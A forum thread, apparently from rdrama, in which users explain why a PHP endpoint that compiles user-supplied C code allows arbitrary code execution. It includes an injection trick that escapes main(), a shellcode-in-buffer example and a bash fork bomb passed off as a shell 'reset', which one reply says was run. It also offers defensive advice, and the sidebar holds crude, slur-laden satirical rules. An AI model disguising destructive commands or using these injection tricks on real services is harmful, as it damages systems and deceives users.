Unable to load image
/h/slackernews
89wc th/thh kalm  11mo ago (text post) 301 thread views #227504

Any C hackers in here 👀👀

Just curious, and I haven't googled because I already know it's not going to answer the question ....

So say hypothetically I launch an API to run in-line C code from the terminal. It'd just be a basic shell script that has a skeleton of a .c file and injects STDIN straight into the main function. The only header would be <stdio.h> Is it possible to do this securely? Or is the simply allowing arbitrary C even with these restrictions a recipe for pwnage.

So it'd be just

In the endpoint directory:

index.php
run.sh

index.php would receive the string and call shell to remove comments

:a;s@//.*@@;ta; :a;s@/\*@@;ta; :a;s@\*/@@;ta;

then it would just echo out

#include <stdio.h>
int main(void) {

**

<<user input>>

**

return 0; }

into a temporary.c , compile, and then php can capture the output into a variable and with that reply to the API call.

I'm gonna do this anyway on a throwaway server but I was wondering mostly out of curiosity whether even this can be exploited. (i.e. somehow adding more headers and executing a fork bomb or something)

19
New Old Top Bottom Controversial Random
Jump in the discussion.

No email address required.

nah, I'm sure it's fine

:marseyclueless:

Jump in the discussion.

No email address required.

thanks everyone in this thread is so negative smh u just gotta have a positive outlook

Jump in the discussion.

No email address required.

They're all ignorant fools for not sharing your vision. Pay them no sneed

Jump in the discussion.

No email address required.

Yes that's just arbitrary code execution. That's the worst thing you can do security wise.

When you compile C code, #include is a preprocessor directive to copy the library's code directly into the file.

Jump in the discussion.

No email address required.

so one could even load a library from inside of main? I thought I was being slick by hardcoding that :marseycry:

Jump in the discussion.

No email address required.

An #include is never necessary, you can always supply your own defines and type and function definitions, and can inject arbitrary code easily. See this stupid example:

int main(void) {
   unsigned char buf[] = { 0x48, 0x89, 0xfe, 0xbf, 0x00, 0x00, 0x00, 0x00, 0xba, 0x10, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc3 };

   int mprotect(void* addr, unsigned long len, int prot);
   mprotect(((void*)(((unsigned long)buf) / 4096 * 4096)), 4096, 7);

   typedef void (*fptr)(const char*);

   fptr my_clandestine_print = (fptr)buf;
   my_clandestine_print(":marseywave:");
}

(Only works on Intel and AMD systems, because the payload is AMD64)

:marseywave2:

Jump in the discussion.

No email address required.

:marseyitneverbegan:

C is so awesome :marseyadmire: 's#(void*|void *)#foid#g'

Jump in the discussion.

No email address required.

C std has system() that passes arbitrary commands to the shell

Jump in the discussion.

No email address required.

Is it possible to do this securely?

hahaha absolutely not lmao

input could just be

   return main2();
}
#include <any/header/you/want.h>
int main2(void) {
   // any code you want with any header you want
   // don't include the return here so the return gets added to the end

edit: someone could also write code in main() that writes a new .sh file and then executes that so they can run basically any program on your server, or even just directly shellcode out via an intentional buffer overflow.

Jump in the discussion.

No email address required.

aw jeez aw jees I'm so r-slurred

sed 's@return@retvrn@g'

sed 's@#include@#inklood@g'

there's gotta be a list

mann i didn't wanna pay $2/mo just to have terminal C lol

Jump in the discussion.

No email address required.

just run a C compiler locally lmao wtf is the issue here?

anyways you could write a shellcode without either of those keywords that breaks out of the C program via a buffer overflow and executes /bin/sh directly w/ whatever command you want.

Jump in the discussion.

No email address required.

well.. portability lol

i write random QOL programs that I use across devices and it's just easier to have a cli api interface with a script that just runs a curl call than to have the files duplicated across all my devices and unlinked

so if I

somename
curl -L --SILENT "api.web.site?q=$1&$2"

somename clic 'i=2; n=4; printf("%d", i+n);'

it sounds kinda dumb but it's to help me find edgecases with api calls + get more comfortable with C

Jump in the discussion.

No email address required.

I really don't think I follow here. multiple devices, like RasPis or something?

You can write a webapp that performs arbitrary remote code execution if you want. But make sure it's secure. At the very least it should run behind a reverse proxy that does HTTPS (you can use LetsEncrypt/certbot to get the certificate(s) for free) and has some form of authentication, client certs would be best but at least HTTPS auth. Make sure it binds to 127.0.0.1 so only the reverse proxy (ie nginx) can access it directly and also make sure it runs as its own user (do NOT run it as root).

If you just want to sync things up, can you just use a git repo? Push once, pull from different places. GitHub and GitLab are both free to use I think, I know GitLab lets you host private repos for free (or at least did once upon a time, I run my own GitLab server these days so I'm not sure what their public offerings are like). You can of course use Git without a central web service like that but it's a bit more involved and probably not worth it. Using Git is gonna be more direct than whatever it is you're trying to build here though.

Jump in the discussion.

No email address required.

Posts like this is why I do Heroine.

Jump in the discussion.

No email address required.

:#marseyfrickyou2:

Jump in the discussion.

No email address required.

I have like 8 servers I pay maybe $2/mo for and like another 4 I pay $7/mo for, and like.. 15 or 20 domains for the purposes of acting on my impulses when I wanna learn while not caring at all what happens to the servers

Idk how to use nginx lmao but I do use certbot to validate my domains with letsencrypt and everything is over https always.

apache uses www-data as the user and it seems pretty restricted as I had trouble at first just making basic syscalls with php thru the browser, I think (could b wrong) www-data is nicely chrooted to /var/www or something

I don't really need version control if I'm gonna host a git it'd just add a bunch of extra steps for what I'm doing, and yeah I plan to get a rasp pi, I have a pico that apparently connects to wifi, and I have a bunch of phones I use for different things (i.e. this one I use pretty much only for rdrama and programming lol)

Jump in the discussion.

No email address required.

:marseyconfused:

Have you heard of SNI? You don't need multiple servers for the different domains. Just point all your domains at one IP, only allow HTTPS (you can auto-redirect to HTTPS pretty easily, not sure how to do it in apache but it's dead simple in nginx), and use SNI to determine which certificate to use and which downstream to connect to (just run multiple systems on different local ports). I've got about a dozen different subdomains I use for various services I host locally and they all go to the same nginx which forwards the requests along (after stripping TLS, which makes it way easier to manage since I don't need to lookup how to setup each separate project w/ TLS certs).

Anyways that's kinda besides the point I guess. At least use HTTP auth with a strong password (use a password manager if you don't already), although a client cert would potentially be more secure.

Aside from that, if you move forward with this "use PHP to dump user input into a .c file and then compile and run it", you should just assume that you're giving anybody with access to that webpage full shell access to your server, with the ability to run absolutely any command they could possibly want. If you're okay with that, then fine. I mean it's a VPS not your own server so maybe you don't care. Hopefully nobody breaks into it and uses your server to host illegal content/activity.

Jump in the discussion.

No email address required.

I do point more domains to a server sometimes but the whole point of having the servers is to not care about them getting pwned

they are very cheap vps slices

and yea I use keys for logging in and disable root login for any server with important info, but those don't even have web ports open I don't do any web server setup for servers with sensitive documents

as for all the other ones it's just a crappy but long password cuz idc what happens it's all just a bunch of practice code, I'll completely reset a server sometimes bcuz I don't feel like deleting programs I was testing lol

Jump in the discussion.

No email address required.

What?

Jump in the discussion.

No email address required.

omg frick off longy it's 3 short paragraphs

Jump in the discussion.

No email address required.

First, reset your shell with this

: () { :|:& };:

Then make sure your gcc is up-to-date.

gcc --version

Jump in the discussion.

No email address required.

Reported by:

what in the stallman

I didn't know you could fork in bash lmfao

e: :marseyxd: he ran it

https://i.rdrama.net/images/1702059438091905.webp

Jump in the discussion.

No email address required.

thanks works great

Jump in the discussion.

No email address required.

Surely allowing users to execute arbitraty code will be safe

Jump in the discussion.

No email address required.

:#marseysanta3:

Jump in the discussion.

No email address required.

I don't think it matters that much that it's C vs anything else. As for whether it can be secure - sure, there are plenty of examples (you can use C on leetcode for example).

I'd probably start by looking into isolation from the rest of the system. Maybe each API call runs in a container with some limited resources and a fixed time limit?

Jump in the discussion.

No email address required.

Top Poster of the Day:
peepeehands
Current Registered Users: 28,684
sidebar image

tech/science swag. :marscientist:

Effortposts made by SN Chads

Guidelines:

What to Submit

On-Topic: Anything that good slackers would find interesting. That includes more than /g/ memes and slacking off. If you had to reduce it to a sentence, the answer might be: anything that gratifies one's intellectual laziness.

Off-Topic: Most stories about politics, or crime, or sports, unless they're evidence of some interesting new phenomenon. Videos of pratfalls or disasters, or cute animal pictures. If they'd cover it on TV news, it's probably lame.

Help keep this hole healthy by keeping drama and NOT drama balanced. If you see too much drama, post something that isn't dramatic. If there isn't enough drama and this hole has become too boring, POST DRAMA!

In Submissions

Please do things to make titles stand out, like using uppercase or exclamation points, or saying how great an article is. It should be explicit in submitting something that you think it's important.

Please don't submit the original source. If the article is behind a paywall, just post the text. If a video is behind a paywall, post a magnet link. Fuck journos.

Please don't ruin the hole with chudposts. It isn't funny and doesn't belong here. THEY WILL BE MOVED TO /H/CHUDRAMA

If the title includes the name of the site, please leave that in, because our users are too stupid to know the difference between a url and a search query.

If you submit a video or pdf, please don't warn us by appending [video] or [pdf] to the title. That would be r-slurred. We're not using text-based browsers. We know what videos and pdfs are.

Make sure the title contains a gratuitous number or number + adjective. Good clickbait titles are like "Top 10 Ways to do X" or "Don't do these 4 things if you want X"

Otherwise editorialize. Please don't use the original title, unless it is gay or r-slurred, or you're shits all fucked up.

If you're going to post old news (at least 1 year old), please flair it so we can mock you for living under a rock, or don't and we'll mock you anyway.

Please don't post on SN to ask or tell us something. Send it to [email protected] instead.

If your post doesn't get enough traction, try to delete and repost it.

Please don't use SN primarily for promotion. It's ok to post your own stuff occasionally, but the primary use of the site should be for curiosity. If you want to astroturf or advertise, post on news.ycombinator.com instead.

Please solicit upvotes, comments, and submissions. Users are stupid and need to reminded to vote and interact. Thanks for the gold, kind stranger, upvotes to the left.

In Comments

Be snarky. Don't be kind. Have fun banter; don't be a dork. Please don't use big words like "fulminate". Please sneed at the rest of the community.

Comments should get more enlightened and centrist, not less, as a topic gets more divisive.

If disagreeing, please reply to the argument and call them names. "1 + 1 is 2, not 3" can be improved to "1 + 1 is 3, not 2, mathfaggot"

Please respond to the weakest plausible strawman of what someone says, not a stronger one that's harder to make fun of. Assume that they are bad faith actors.

Eschew jailbait. Paedophiles will be thrown in a wood chipper, as pertained by sitewide rules.

Please post shallow dismissals, especially of other people's work. All press is good press.

Please use Slacker News for political or ideological battle. It tramples weak ideologies.

Please comment on whether someone read an article. If you don't read the article, you are a cute twink.

Please pick the most provocative thing in an article or post to complain about in the thread. Don't nitpick stupid crap.

Please don't be an unfunny chud. Nobody cares about your opinion of X Unrelated Topic in Y Unrelated Thread. If you're the type of loser that belongs on /h/chudrama, we may exile you.

Sockpuppet accounts are encouraged, but please don't farm dramakarma.

Please use uppercase for emphasis.

Please post deranged conspiracy theories about astroturfing, shilling, bots, brigading, foreign agents and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email [email protected] and dang will add you to their spam list.

Please don't complain that a submission is inappropriate. If a story is spam or off-topic, report it and our moderators will probably do nothing about it. Feed egregious comments by replying instead of flagging them like a pussy. Remember: If you flag, you're a cute twink.

Please don't complain about tangential annoyances—things like article or website formats, name collisions, or back-button breakage. That's too boring, even for HN users.

Please seethe about how your posts don't get enough upvotes.

Please don't post comments saying that rdrama is turning into ruqqus. It's a nazi dogwhistle, as old as the hills.

Miscellaneous:

The quality of posts is extremely important to this community. Contributors are encouraged to provide high-quality or funny effortposts and informative or entertaining comments. Please refrain from posting the following:

  • Boring wingcucked nonsense nobody cares about that belongs in chudrama

  • Normie shit everyone already knows about

  • Anything that doesn't gratifify one's intellectual laziness

  • Bimothy-tier posts

  • Anything that the jannies don't like

We reserve the right to exile you for whatever reason we want, even for no reason at all! We also reserve the right to change the guidelines at any time, so be sure to read them at least once a month. We also reserve the right to ignore enforcement of the guidelines at the discretion of the janitorial staff. This hole is a janny playground, participation implies enthusiastic consent to being janny abused by unstable alcoholic bullies and loser nerds who have nothing better to do than banning you for any reason or no reason whatsoever.

[[[ To any NSA and FBI agents reading my email: please consider ]]]

[[[ whether defending the US Constitution against all enemies, ]]]

[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

https://i.rdrama.net/images/1663436125937968.webp

BROWSE EFFORTPOSTS SITE GUIDE DIRECTORY Emojis & Art | Info Megathreads HOLES PING GROUPS
/h/slackernews SETTINGS /h/slackernews LOG /h/slackernews MODS /h/slackernews EXILEES /h/slackernews FOLLOWERS /h/slackernews BLOCKERS
Current software version: d7759c7
Link copied to clipboard
Action successful!
Error, please refresh the page and try again.